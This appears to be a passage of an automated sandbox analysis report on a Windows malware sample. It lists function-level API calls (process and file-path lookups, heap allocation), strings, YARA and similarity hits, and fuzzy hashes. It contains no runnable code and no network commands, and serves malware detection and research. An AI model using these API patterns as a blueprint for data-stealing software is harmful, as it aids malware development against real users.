                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 22a427d7fe272d45f2828974e307349803aad1c0f7d377a6036d6a4d8312b2ae
                              • Instruction ID: 95c4e832a703af6caf502b917ec2f78fbd6a2481fd90bd0b15b78ab16ac0ed99
                              • Opcode Fuzzy Hash: 22a427d7fe272d45f2828974e307349803aad1c0f7d377a6036d6a4d8312b2ae
                              • Instruction Fuzzy Hash: 183197B5E005159FCB08DF58C8917AEBBB6EB88350F188269E9159B345DB34AD01CB91
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5922
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5935
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: same 16 associated memory dumps as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_std::exception::exception
                              • String ID: Sec-WebSocket-Version: 13$string too long
                              • API String ID: 1928653953-3304177573
                              • Opcode ID: 7d7d71634c4323abf976b6dcd93de2d9aaf45b386d6154873a825b35a36421ee
                              • Instruction ID: 5b59b480e327e7bd309956c84257b4f4d6daac3e788831072b2e4dacd11ad983
                              • Opcode Fuzzy Hash: 7d7d71634c4323abf976b6dcd93de2d9aaf45b386d6154873a825b35a36421ee
                              • Instruction Fuzzy Hash: 45113C31304B40CBD7218B2CE810B1AB7F5AB95761F250A9BE0D187796DBB9E841C7A5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,007DA430,000000FF), ref: 007D3D20
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D3D27
                              • wsprintfA.USER32 ref: 007D3D37
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: same 16 associated memory dumps as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f475ba2b246370ae9966951b9f4a734a703982fa78f6018f3bc1b3c5ef37131e
                              • Instruction ID: c6ab4f5835b7ed52e43f73207ab67a62a6a8ff5adce4d163919162e2f403df50
                              • Opcode Fuzzy Hash: f475ba2b246370ae9966951b9f4a734a703982fa78f6018f3bc1b3c5ef37131e
                              • Instruction Fuzzy Hash: 8801D2B1648384BFE7209B94DC8AF6ABB7CFB46B62F400115FA059B3D0D7B41D00CAA1
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007B8737
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: same 16 associated memory dumps as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 7cf2b761aa091fbb3cabc82f2968cab631137bbf0cc445e536208bcac9c68fcd
                              • Instruction ID: b4a02593a50a2f07cfde182bc79406e9bb284d8ccb208c231fd16c61c4a73385
                              • Opcode Fuzzy Hash: 7cf2b761aa091fbb3cabc82f2968cab631137bbf0cc445e536208bcac9c68fcd
                              • Instruction Fuzzy Hash: 52F02437F000224F8394647E8C881DEA84B56E439433AC725E80AEF359EC38EC82C1D2
                              APIs
                                • Part of subcall function 007D781C: __mtinitlocknum.LIBCMT ref: 007D7832
                                • Part of subcall function 007D781C: __amsg_exit.LIBCMT ref: 007D783E
                              • ___addlocaleref.LIBCMT ref: 007D8756
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: same 16 associated memory dumps as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$Xu~$xt~
                              • API String ID: 3105635775-1326991048
                              • Opcode ID: 3378751c563d7f72785e77b42d597b8c9745ded80d35cc66f6759ed011976044
                              • Instruction ID: e6c03cd6275d5104cac615da076cb8959450ec63e573269bf5c68e93603eb1e9
                              • Opcode Fuzzy Hash: 3378751c563d7f72785e77b42d597b8c9745ded80d35cc66f6759ed011976044
                              • Instruction Fuzzy Hash: EB018071545B40DAD724AFB9D80E74ABBF0AF50324F20890FE4D5573E1CBB8AA44CB15
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CE544
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE573
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE581
                              • lstrcat.KERNEL32(?,0145D2A0), ref: 007CE59C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: same 16 associated memory dumps as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 244a3618354a58ca51e3fea00acf90b3f21c9eaabc9266a4e218812b82229886
                              • Instruction ID: 864722442cb72e65f45303fdd56334468e650da9ce1494f762e00a31317b99c8
                              • Opcode Fuzzy Hash: 244a3618354a58ca51e3fea00acf90b3f21c9eaabc9266a4e218812b82229886
                              • Instruction Fuzzy Hash: 445188B5910108EBDB55EF54EC86FEE337DFB48300F44446DB90AA7241DE74AE459BA0
                              APIs
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 007D1FDF, 007D1FF5, 007D20B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: same 16 associated memory dumps as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: strlen
                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 39653677-4138519520
                              • Opcode ID: b710f0ec8f5f451958e953f4348574866c89379115a775d3d7abf00d5e914301
                              • Instruction ID: 30927540a02d5fa86347a30d678871135e4cd69e93faba6cf73d5d4c97bb6084
                              • Opcode Fuzzy Hash: b710f0ec8f5f451958e953f4348574866c89379115a775d3d7abf00d5e914301
                              • Instruction Fuzzy Hash: A12126399102898BDB20EA35C4446DDF7B6EF94762F884057C8194B383E33E191BD796
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CEBB4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CEBE3
                              • lstrcat.KERNEL32(?,00000000), ref: 007CEBF1
                              • lstrcat.KERNEL32(?,0145DCA8), ref: 007CEC0C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: same 16 associated memory dumps as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: e320f783a263011baf9fab7613bb7d2221f1cae69782ce3099e0621899836af8
                              • Instruction ID: 7c7359fad1988fbd198217de419dcd629efeaa9b750f09e1044e2b34c4efeede
                              • Opcode Fuzzy Hash: e320f783a263011baf9fab7613bb7d2221f1cae69782ce3099e0621899836af8
                              • Instruction Fuzzy Hash: 1A31A971911158EBCB61EF64DC45FEE73B4BF48300F1044A8BA0ABB241DE749E458B90
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000), ref: 007D4492
                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 007D44AD
                              • CloseHandle.KERNEL32(00000000), ref: 007D44B4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D44E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: same 16 associated memory dumps as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                              • String ID:
                              • API String ID: 4028989146-0
                              • Opcode ID: e9ef430251eea695b48e015f3da907ae13e15cba3fc28f2a5dcafc6908389935
                              • Instruction ID: 57557a92828375b5eb3bff33ac2f5ac73ed63fe52cbb8d50e34bda33fec0b6ec
                              • Opcode Fuzzy Hash: e9ef430251eea695b48e015f3da907ae13e15cba3fc28f2a5dcafc6908389935
                              • Instruction Fuzzy Hash: E1F0FCB09056956BE7209B74DC4DBE67AB8AF14305F0405A1FA49DB280DBB49CC08790
                              APIs
                              • __getptd.LIBCMT ref: 007D8FDD
                                • Part of subcall function 007D87FF: __amsg_exit.LIBCMT ref: 007D880F
                              • __getptd.LIBCMT ref: 007D8FF4
                              • __amsg_exit.LIBCMT ref: 007D9002
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 007D9026
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 9fa734c1ecf28648d3a38dd521efe8fe926db452ccc7903cdf3ec3675ebea47c
                              • Instruction ID: 75feb742e89ce40832ad7f1900f7392629084bbe9e9bc3a9d2d82b2e71d378c5
                              • Opcode Fuzzy Hash: 9fa734c1ecf28648d3a38dd521efe8fe926db452ccc7903cdf3ec3675ebea47c
                              • Instruction Fuzzy Hash: A8F09632909710DBD7A4BB78680F75D33B16F04720F24810BF544AA3D2EF6C5900E66A
                              APIs
                              • lstrlen.KERNEL32(------,007B5BEB), ref: 007D731B
                              • lstrcpy.KERNEL32(00000000), ref: 007D733F
                              • lstrcat.KERNEL32(?,------), ref: 007D7349
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcatlstrcpylstrlen
                              • String ID: ------
                              • API String ID: 3050337572-882505780
                              • Opcode ID: a1b7ea84b1a85990c8dc456cc434745692d38ab78763d691e3b406a780d11851
                              • Instruction ID: 4d72b219829b464c2d04fb1a377da8d2018cc374605fe9eb293295d445cd2015
                              • Opcode Fuzzy Hash: a1b7ea84b1a85990c8dc456cc434745692d38ab78763d691e3b406a780d11851
                              • Instruction Fuzzy Hash: 93F039745193429FDB289F35DC89927BAF8EF84705318882EA89AC7314EB34E840DB10
                              APIs
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C3422
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C344B
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C3471
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C3497
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: e2f407f80b30abe914e0767ac0bfe79ad9858299bc9de5c392e90ab74c6bac05
                              • Instruction ID: 09c7cd61501512775f8a64f6f13becda3812b35773ae6f7c9dd6bd7983929b92
                              • Opcode Fuzzy Hash: e2f407f80b30abe914e0767ac0bfe79ad9858299bc9de5c392e90ab74c6bac05
                              • Instruction Fuzzy Hash: DA12FD70A152018FDB18CF29D594F25B7E5BF45718B19C0AEE809DB3A2D77AED42CB40
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7C94
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7CAF
                                • Part of subcall function 007C7D40: std::_Xinvalid_argument.LIBCPMT ref: 007C7D58
                                • Part of subcall function 007C7D40: std::_Xinvalid_argument.LIBCPMT ref: 007C7D76
                                • Part of subcall function 007C7D40: std::_Xinvalid_argument.LIBCPMT ref: 007C7D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: string too long
                              • API String ID: 909987262-2556327735
                              • Opcode ID: 700439c79636f4ee4bdd6f8fbfee73f1005440bb4505444444af463f68f1a5c0
                              • Instruction ID: 541d635f14c749be2871b0e725299ec48c30d8c7dc8db6787dca7ca964621021
                              • Opcode Fuzzy Hash: 700439c79636f4ee4bdd6f8fbfee73f1005440bb4505444444af463f68f1a5c0
                              • Instruction Fuzzy Hash: 9431D6723082158BD7389D6CE880F6AF7EDEF91750B20462EF5528B641DB799C41CBB4
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 007B6F74
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B6F7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID: @
                              • API String ID: 1357844191-2766056989
                              • Opcode ID: cbea2e3fa03576ede8a7762ec51dae29c4440dbb56ac6ab5b1f6ac087163ce10
                              • Instruction ID: d2ceef6d5572559b52c1689823b2629b4bf11672fe5448195a0f49589b7f3301
                              • Opcode Fuzzy Hash: cbea2e3fa03576ede8a7762ec51dae29c4440dbb56ac6ab5b1f6ac087163ce10
                              • Instruction Fuzzy Hash: 5A215CB16006019FEB20CB24DC85BBA73A8EB41705F448978FA46CBA85FB7DE946C750
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 007D15A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D15D9
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D1611
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D1649
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 93c54488305130574c844b438686ddbbc492fe0ea21eb7bbd87bee0fec95e6cb
                              • Instruction ID: 1e43c2c1fb4035efab0a0a6c4e13ab6d15df416e453fd5b18db43aa655b1154e
                              • Opcode Fuzzy Hash: 93c54488305130574c844b438686ddbbc492fe0ea21eb7bbd87bee0fec95e6cb
                              • Instruction Fuzzy Hash: 57213974611B02ABD724DF2AD498B17B7F4AF44300B444A1DA89BD7B41EB38F851CBA0
                              APIs
                                • Part of subcall function 007B1610: lstrcpy.KERNEL32(00000000), ref: 007B162D
                                • Part of subcall function 007B1610: lstrcpy.KERNEL32(00000000,?), ref: 007B164F
                                • Part of subcall function 007B1610: lstrcpy.KERNEL32(00000000,?), ref: 007B1671
                                • Part of subcall function 007B1610: lstrcpy.KERNEL32(00000000,?), ref: 007B1693
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 03920d4f91d4823a5a73fe38b1b42fe8b030078cf5f9869a8fa31c63734d9c18
                              • Instruction ID: a3be942feb1e90c19b7606ee71d847adb538a66547341e4dbeb1cfc7eece23ce
                              • Opcode Fuzzy Hash: 03920d4f91d4823a5a73fe38b1b42fe8b030078cf5f9869a8fa31c63734d9c18
                              • Instruction Fuzzy Hash: A331B474A15B42DFD724DF3AC598A96BBE5BF89305784492DA896C3B10DB34F821CB80
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 007B162D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B164F
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1671
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1693
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 4447b29f294eaec1b14ae02c3ec19006fb7727c4846eb68b77f1ace2eace4a06
                              • Instruction ID: d2873bf035c4b5419ba3fcd0bd06011ca2befe78e34347689048f4d0c4f51f90
                              • Opcode Fuzzy Hash: 4447b29f294eaec1b14ae02c3ec19006fb7727c4846eb68b77f1ace2eace4a06
                              • Instruction Fuzzy Hash: 46112E74A16B029BDB249F35D46CA66B7F8BF44305788052DA89AC7B41EF38F801CB90